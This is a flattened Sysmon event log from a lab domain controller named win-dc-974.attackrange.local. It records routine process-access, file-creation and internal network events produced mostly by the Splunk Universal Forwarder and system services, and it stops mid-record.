16:52:04.199{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D34-603E-5AAA-00000000AD01}12684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.199{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.199{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.199{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235074Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.199{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.199{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D34-603E-5AAA-00000000AD01}12684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.199{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D34-603E-5AAA-00000000AD01}12684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002235071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:04.201{05ADC7E1-6D34-603E-5AAA-00000000AD01}12684C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002235070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:03.996{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C0533804260003168344703BB794CB4,SHA256=642C44F16B3EB8AD2553375D8676F0D7F66D3402AD0E9EB3432ABB09545AB587,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002235094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.416{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local54285- 354300x80000000000000002235093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:55.369{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60117-false10.0.1.12-8000- 23542300x80000000000000002235092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:05.699{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0474C7AE4332843A44D5B3894226F79,SHA256=81DDC8FB46D39042580256EF5B7A47AA30D679FF00217047CD18ECCC29ABDC8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:05.356{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AC802440A13713349D7A27AEB0F98E51,SHA256=F3E91DB853D5A876510CF223E6A5F4F7B277EEAD7DE778793B9E1AD092EA9A76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:05.246{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=310CAD49109AEBE229DCD5FB4A3DB1B5,SHA256=69A69844AF5A91014A663FFC372BE436877795FA83925F3782608A8BB23D52A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:05.074{05ADC7E1-6D34-603E-5BAA-00000000AD01}115488736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002235095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:06.718{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCC879FBC87EC584ACC3E67C562F773B,SHA256=92445B5098ED56F61053E6A742EB09F01E7F4385DA674ECDFF569FD15409BEC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:07.746{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22DF42388617D97EA09AF42FAA92EA0E,SHA256=224EEE5E9E5920B6270A818F453F98C878B642CFC8A9025E93EC571C6F96D03A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:08.778{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54B7B0AA060A632D6A6FB9BD40623432,SHA256=CE48FBEE69AF028234B30EF5937F5FFDE3FB45770138A9D392E9E7BE4AD03B37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:09.811{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5C697B63FA15E8F3587E17CBF55741B,SHA256=D017E55B40B6FB856804DDDA4A9DF2973A5D9E47645E34D151546BEACE2A60E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:10.840{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=007312E6CBCD0B8734372FF21E412CFD,SHA256=47511945B3FCFB25571FB2195D760DC363BFB8C6FC603050BBC9053CF3E987C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:10.262{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F9A9B7B902E469BF4A7CA9EB4A3A990,SHA256=13854134B124EABEE630B650846ED073E8BB24187F5FE96F7D12971BB66B3467,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:10.262{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5FF93DDA2350AA5F3B4F371AED015C6E,SHA256=C8B472EEB3B8DDBA8DBF9B409ADD8DB1ED02EDDF6771395838D0F37E5F44C233,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:11.949{05ADC7E1-229F-6039-1100-00000000AD01}1152NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4765557C9233F277F13AFE29EBFDB2AA,SHA256=53896BF68EB324493C462D82E03113CD1B3ADFB089C659D521DF9E38D1C32053,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:11.871{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5ADBE64F9A1E22FAC846291400BECC9,SHA256=96D9536DA04A6BE9F509A72199123592C6FBFF03FFBD0120935B7546D1948676,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002235102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:00.401{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60118-false10.0.1.12-8000- 23542300x80000000000000002235106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:12.903{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99FE0395D8032814BF562A9F58F5C8EE,SHA256=44733849A0437D30D3CBFD21FB648724F14AC62A61F183CFC5008EBCA9B40D38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:12.340{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F9A9B7B902E469BF4A7CA9EB4A3A990,SHA256=13854134B124EABEE630B650846ED073E8BB24187F5FE96F7D12971BB66B3467,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:13.921{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7A24BD5ECE2F4C002EBB3CFBDDA2835,SHA256=9B29FFBA611BD020163388BA14C64743CA02DAA4511275C0D277432B2C8C0EE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:14.934{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DB8C4B8A7E4749F628DBBD19B0DA1ED,SHA256=5AB0982D7E37A15409436E4FE50A8B71A5AE399F565F5CBA95D66971C2ADDAE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:14.023{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E1B2ECD566A45DE4F3780F5FC298277,SHA256=89FF5C14D2D39ACDB7D95D05EE053ABFB5104F6E9DF7569EF6888CE8E3CC6069,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:15.262{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8F9ED22666C16CA1C620A0A59E43C854,SHA256=760D70B6F6D9F1B221F9264AC55A5EB961148D0A230401211F71968190875B9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002235113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:06.197{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60119-false10.0.1.12-8000- 23542300x80000000000000002235112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:16.074{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A3916FC45193365162B50BAFCAAA186,SHA256=6FE9DFC44FDB06291757F472B73364CB20E4115E407D64BCF790927D9B5145D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:15.996{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A6D8B02A00FC4D61703D7131AE2184D,SHA256=2B0356A2643B283EED104953618E14A9DD0E3ED18FF7263DCD0CC6292284E623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:17.520{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A405FAEAFD244ABB9252183BE1AD0F60,SHA256=18FE4F65E0789B83698C33DAC7D2A82EDB1B2984A2A1A6C250D7F981A7474E06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:17.017{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63610AB31E837CE1D9C89F347B16DD90,SHA256=7B38717F351F00A638C3910777FA4E46C78061011741A9F3D2C2E00E4B430037,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:18.023{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26B61FDD43447816A9F44714175B46B4,SHA256=EEB78892F938DE557FCBCEEEDFBF196AA77090D04A792F9BDFB5F13481FBF23E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.981{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D43-603E-5EAA-00000000AD01}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.981{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.981{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:19.981{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 